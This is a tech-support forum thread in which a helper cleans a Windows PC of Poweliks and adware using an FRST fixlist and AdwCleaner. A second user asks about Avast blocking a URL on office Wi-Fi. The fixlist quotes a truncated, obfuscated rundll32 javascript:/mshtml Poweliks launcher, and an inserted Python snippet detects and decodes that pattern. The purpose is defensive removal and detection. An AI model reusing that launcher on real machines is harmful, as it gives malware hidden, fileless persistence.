Frequent "avast! Web Shield has blocked..." popup messages

Every minute or so I’m getting the avast message about a blocked infection “URL:Mal”, with various websites being blocked. Computer is running slowly. I’ve seen in other threads that people have had this same kind of problem and users on this forum have helped fix the problem. So, per the thread “Logs to assist in cleaning malware”, I’ve attached my logs.

Note, the aswMBR log file is likely incomplete because both times I tried to run it, it seemed to get stuck scanning on the same Windows Live file. The first time I let it run for 15 minutes extra while it was stuck on that file. The second time I ran aswMBR, it was stuck on the Windows Live file for about 5 minutes before I decided to hit the Stop button. But I still saved the log file from the first scan and attached it here, for what it’s worth.

Can anyone help me? Thank you in advance.

Hi, could you temporarily uninstall Spybot, as it will try to revert some of the registry changes I am going to make.
The alerts should cease after the FRST fix.

CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.

Open notepad and copy/paste the text in the quotebox below into it:

```
HKU\S-1-5-21-1453027232-3423548673-3437265280-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
IFEO: [Debugger] svchost.exe
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://start.funmoods.com/results.php?f=4&q={searchTerms}&a=iron2&chnl=iron2&cd=2XzuyEtN2Y1L1QzuzzyEtB0BtB0B0A0FyEyD0DtByD0B0A0AtN0D0Tzu0CtByEtBtN1L2XzutBtFtCtFtCtFtAtCtB&cr=692770098
SearchScopes: HKLM -> {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL = 
SearchScopes: HKLM-x32 -> Backup.Old.DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://start.funmoods.com/results.php?f=4&q={searchTerms}&a=iron2&chnl=iron2&cd=2XzuyEtN2Y1L1QzuzzyEtB0BtB0B0A0FyEyD0DtByD0B0A0AtN0D0Tzu0CtByEtBtN1L2XzutBtFtCtFtCtFtAtCtB&cr=692770098
SearchScopes: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003 -> DefaultScope {7AA4F26E-FB62-AB97-10AB-4C0B3D4C3477} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ir_14_40_ie&cd=2XzuyEtN2Y1L1QzuzzyEtB0BtB0B0A0FyEyD0DtByD0B0A0AtN0D0Tzu0StCtDtDzytN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StA0F0F0CyCzyzy0EtGyDyC0ByBtGtCyB0C0CtGyD0DyB0EtGyB0Ezy0CtAzyyB0CyByDtAtB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAtCtC0CyEtAzy0EtG0E0D0AyCtGyEzytD0CtG0B0AtD0CtG0FtAyE0BtCzy0AtCtBzy0Dzy2Q&cr=434781924&ir=
SearchScopes: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003 -> Backup.Old.DefaultScope {95B7759C-8C7F-4BF1-B163-73684A933233}
SearchScopes: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003 -> {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL = https://isearch.avg.com/search?cid={26DAEBF7-3D41-4DFF-8AEB-FB74EFFC34FC}&mid=9a9e434c49a147d6a53355626d4bac21-3e7198b96dbe95028d707e42b3e0e203711fec1f&lang=en&ds=AVG&pr=fr&d=2012-07-19 18:22:26&v=12.1.0.20&sap=dsp&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003 -> {4157AAB3-8976-4FF0-A085-A8EB60DC501C} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3287375&CUI=UN92209949028376266&UM=2
SearchScopes: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003 -> {7AA4F26E-FB62-AB97-10AB-4C0B3D4C3477} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ir_14_40_ie&cd=2XzuyEtN2Y1L1QzuzzyEtB0BtB0B0A0FyEyD0DtByD0B0A0AtN0D0Tzu0StCtDtDzytN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StA0F0F0CyCzyzy0EtGyDyC0ByBtGtCyB0C0CtGyD0DyB0EtGyB0Ezy0CtAzyyB0CyByDtAtB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAtCtC0CyEtAzy0EtG0E0D0AyCtGyEzytD0CtG0B0AtD0CtG0FtAyE0BtCzy0AtCtBzy0Dzy2Q&cr=434781924&ir=
SearchScopes: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = http://isearch.avg.com/search?cid={26DAEBF7-3D41-4DFF-8AEB-FB74EFFC34FC}&mid=9a9e434c49a147d6a53355626d4bac21-3e7198b96dbe95028d707e42b3e0e203711fec1f&lang=en&ds=AVG&pr=fr&d=2012-07-19 18:22:26&v=15.3.0.11&pid=avg&sg=0&sap=dsp&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003 -> {F7A900EF-5662-4BA3-AF16-57B579D269DB} URL = http://isearch.shopathome.com?user_id={F4A5541A-DB6D-4408-9569-3453469D0361}&q={searchTerms}
Toolbar: HKLM-x32 - No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
Toolbar: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003 -> No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
Toolbar: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File
FF DefaultSearchEngine: Astromenda
FF SelectedSearchEngine: Astromenda
FF SearchPlugin: C:\Users\Valle\AppData\Roaming\Mozilla\Firefox\Profiles\nqx9qqzb.default\searchplugins\Search.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\avg-secure-search.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\avg-secure-search.xml
FF HKLM-x32\...\Firefox\Extensions: [ocr@babylon.com] - C:\Program Files (x86)\Babylon\Babylon-Pro\Utils\ocr@babylon.com
FF HKU\S-1-5-21-1453027232-3423548673-3437265280-1003\...\Firefox\Extensions: [{E5886C91-CDD7-4832-B32D-0830705A9C60}] - C:\Users\Valle\AppData\Roaming\5012
FF Extension: Java String Helper - C:\Users\Valle\AppData\Roaming\5012 [2011-03-26]
FF Extension: No Name - {E5886C91-CDD7-4832-B32D-0830705A9C60} [Not Found]
FF Extension: No Name - wrc@avast.com [Not Found]
CHR DefaultSearchKeyword: Default -> astromenda.com
CHR DefaultSearchURL: Default -> http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ir_14_40_ie&cd=2XzuyEtN2Y1L1QzuzzyEtB0BtB0B0A0FyEyD0DtByD0B0A0AtN0D0Tzu0StCtDtDzytN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StA0F0F0CyCzyzy0EtGyDyC0ByBtGtCyB0C0CtGyD0DyB0EtGyB0Ezy0CtAzyyB0CyByDtAtB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAtCtC0CyEtAzy0EtG0E0D0AyCtGyEzytD0CtG0B0AtD0CtG0FtAyE0BtCzy0AtCtBzy0Dzy2Q&cr=434781924&ir=
CHR Plugin: (AVG Internet Security) - C:\Users\Valle\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmfkcklnlgedgbglfkkgedjfmejoahla\12.0.0.2210_0\plugins/avgnpss.dll No File
2014-11-29 21:02 - 2013-06-02 23:55 - 00000350 _____ () C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job
CustomCLSID: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
Task: {19A35301-2CA0-4AF8-9E5A-1551444D8A48} - System32\Tasks\4681 => Wscript.exe C:\Users\Valle\AppData\Local\Temp\launchie.vbs //B <==== ATTENTION
Task: {65289688-121E-4060-AF42-3F2F77B37DEA} - System32\Tasks\0 => Iexplore.exe <==== ATTENTION
Task: C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job => C:\Windows\TEMP\{028A5CD9-BB21-43BF-917B-9EB6FB5C138B}.exe
C:\Users\Valle\AppData\Local\Google\Desktop\Install
C:\Users\Valle\gotomypc_533.exe
```

Save this as fixlist.txt, in the same location as FRST.exe.

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix.
On completion a log will be generated; please post that.

THEN

Please download AdwCleaner by Xplode onto your desktop.

- Close all open programs and internet browsers.
- Double click on AdwCleaner.exe to run the tool.
- Click on Scan.
- After the scan is complete click on “Clean”.
- Confirm each time with Ok.
- Your computer will be rebooted automatically. A text file will open after the restart.
- Please post the content of that logfile with your next answer.
- You can find the logfile at C:\AdwCleaner[S1].txt as well.
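The first and the CustomCLSID lines of the fixlist are the Poweliks persistence entries: a COM LocalServer32 value that should hold an executable path instead launches rundll32 with a javascript: URL, and the script text is obfuscated by shifting every character code up by one. The following is an added example, not part of this thread or of FRST, showing how a defender can flag such registry values in FRST-style output and undo the shift to read the opening of the script. The sample lines are constructed here; the first one mirrors the quoted entry (the remainder of the value is elided on the page as well).

```python
import re

# Constructed sample lines in FRST style. The first mirrors the Poweliks entry
# quoted in the fixlist above; the second is a benign, made-up LocalServer32 value.
SAMPLE_LINES = [
    r'CustomCLSID: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003_Classes\CLSID'
    r'\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> '
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds',
    r'CustomCLSID: HKU\S-1-5-21-0-0-0-1001_Classes\CLSID'
    r'\{00000000-0000-0000-0000-000000000000}\localserver32 -> C:\Program Files\Vendor\app.exe /server',
]

# A LocalServer32 value is expected to be an executable path. rundll32 being
# handed a javascript: URL that loads mshtml and calls RunHTMLApplication is the
# fileless launcher FRST marks as Poweliks; capture whatever eval() receives.
POWELIKS_RE = re.compile(
    r'rundll32(?:\.exe)?\s+javascript:.*?mshtml,RunHTMLApplication.*?eval\("([^"]*)',
    re.IGNORECASE,
)


def unshift(text: str, shift: int = 1) -> str:
    """Undo the per-character code-point shift applied to the embedded script."""
    return "".join(chr(ord(c) - shift) for c in text)


def find_poweliks(lines):
    """Return (line, decoded_script_fragment) for every line carrying the pattern."""
    hits = []
    for line in lines:
        m = POWELIKS_RE.search(line)
        if m:
            hits.append((line, unshift(m.group(1))))
    return hits


if __name__ == "__main__":
    for line, decoded in find_poweliks(SAMPLE_LINES):
        print("suspicious LocalServer32:", line[:60], "...")
        print("decoded script starts with:", decoded)
```

The decoded fragment of the quoted entry reads as the start of a `document.write('<script language=jscr…` call, which is why the fix deletes that CLSID rather than a file on disk.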

Thank you for replying.

OK, Spybot uninstalled (though I haven’t rebooted yet). FRST64 ran again with your file in the same folder, and I’ve attached the log it spit out.

Now let me go download adwcleaner and let that program run…

You should be noticing an improvement already :slight_smile:

Woohoo! I think it’s solved. I was able to immediately download and start the Adwcleaner, but was called away during the reboot. Now that I’m back, my computer seems nice and quiet and fast again. Thank you. You’ve done your good deed for the day, so you can relax now. ;D

So do you have an idea of what malware caused this? Astromenda? Babylon? Funmoods? I kept seeing those names in the logs. I remember noticing Astromenda was my search engine in Firefox one day, and I went and deleted it from the search engine list. But I guess the sneaky bastard was still hiding on my system. And then the confusing one was AVG Secure Search Toolbar. That’s considered malware? Or is someone posing as AVG?

Hey, say I sleep a few times, and forget what forum I was on, and I have a friend who gets the same computer problem I just had. Would running Malwarebytes, FRST, and AdwCleaner likely clear up the problem? Cause there was also the text file fix you had me run, and I can’t understand most of what was in it. And apparently running CCleaner and Malwarebytes wasn’t enough (since that’s what I did before posting on here).

Again, thank you very much for your help.

> So do you have an idea of what malware caused this? Astromenda? Babylon? Funmoods? I kept seeing those names in the logs. I remember noticing Astromenda was my search engine in Firefox one day, and I went and deleted it from the search engine list. But I guess the sneaky bastard was still hiding on my system. And then the confusing one was AVG Secure Search Toolbar. That's considered malware? Or is someone posing as AVG?

All of the above plus Poweliks... AVG was removed as it does do a bit of advertising on the QT.

MBAM and AdwCleaner are safe enough to use on other systems; however, FRST needs to have a specific script crafted to apply to that system.

Subject to no further problems :slight_smile:

I will remove my tools now and give some recommendations, but I would like you to run for 24 hours or so and come back if you have any problems.

Now the best part of the day: your log now appears clean :thumbsup:

A good workman always cleans up after himself so…The following will implement some cleanup procedures as well as reset System Restore points:

Remove tools

Download and run Delfix

https://dl.dropboxusercontent.com/u/73555776/delfix.JPG

Keep Java Updated

WARNING: Java is the #1 exploited program at this time. The Department of Homeland Security recommends that computer users disable Java.
See this article.

I would recommend that you completely uninstall Java unless you need it to run important software.
In that instance I would recommend that you disable Java in your browsers until you need it for that software, and then enable it. (See How to disable Java in your web browser and How to unplug Java from the browser.)

If you do need to keep Java then download JavaRa.
Run the programme and select Remove Java Runtime. Uninstall all versions of Java present.
Once done, run it again and select Update Java runtime > Download and install Latest version.

https://dl.dropboxusercontent.com/u/73555776/javara.JPG

Now that you are clean, to help protect your computer in the future I recommend that you get the following free programmes:

CryptoPrevent: install this programme to lock down and prevent crypto ransomware.

https://dl.dropboxusercontent.com/u/73555776/CryptoPrevent.JPG

Malwarebytes.

Update and run weekly to keep your system clean.

Unchecky

Click on the link above to be taken to Unchecky.com.
Click the very large Download button.
Click Save.
Click Open folder.
Right click on the Unchecky_setup and choose to Run as Administrator.
Once open click the Install button.
Then click on Finish.
Unchecky is now installed and will help you keep unwanted check boxes unchecked; this is a fire-and-forget programme :wink:

It is critical to have both a firewall and antivirus to protect your system, and to keep them updated.

To learn more about how to protect yourself while on the internet, read this little guide: Best security practices. Keep safe :wave:

Hi Avast folks!
I would like to have an official position from Avast on how to solve this problem. I found many suggestions in this forum and have spent many hours, but no easy solution (for end users) or case of successful fix is reported from people trying to fix this problem.

Problem: I started getting the popup alarm every time I connect my computer at my office. It does not happen when I connect to my home network. (SEE ATTACHMENT)
Message details below:

Avast Web Shield has blocked a harmful website or file
Object: http://www.securityverif.com/xvs.dat
Infection: URL:Mal
Program File: c:\Program Files(x86).…\firefox.exe

NOTE: Object, infection and Program file are the same in all popup messages.

Any help will be very appreciated; otherwise I will have to stop using Avast, which I would not like, as I have had it on my computer for years.

Thanks.
Luis iaderoza

Do you recognise the address it is trying to get to… Is it your network verification page?

Thanks essexboy for your post.
No, I guess it is not my network verification page. I have no idea which “harmful website or file” the popup message refers to. It came up even when I was not using any browser. Today I got it when I had only Skype open.

As this only happens at your work and not at home, it would tend to suggest that your network may be compromised. At the moment the domain is vacant and has been for the last week.

Does this happen only when you have an internet-facing programme open?

I thought the network might be compromised, but I don’t think it is. My colleagues on the same wifi network, using different antivirus programs, don’t have any problems. I am the only one using Avast and getting this malware message.

No, it doesn’t happen only when I have an internet-facing program open. It happens even when I am composing a Word document.

Avast is (as far as I am aware) the only AV that monitors outgoing connections and alerts on them. If you are using Word on the network then it will be interacting with the network system, so if there is a problem then Avast will detect it as you use the network.

Thanks for your help essexboy. Very helpful!
Based on your thoughts, I confirmed I receive the popup messages just by connecting to this specific wi-fi network without opening any program. As we have another wifi network in the office, I connected to that one and got no popup messages from the AV. It means one of our wi-fi networks has a problem and it is causing the issue.
Any suggestions on how to resolve this issue with the specific wi-fi network to avoid the Avast popup messages?

Not really, as your IT department will have to check that one network for any malware that may have inserted itself in the DNS stream.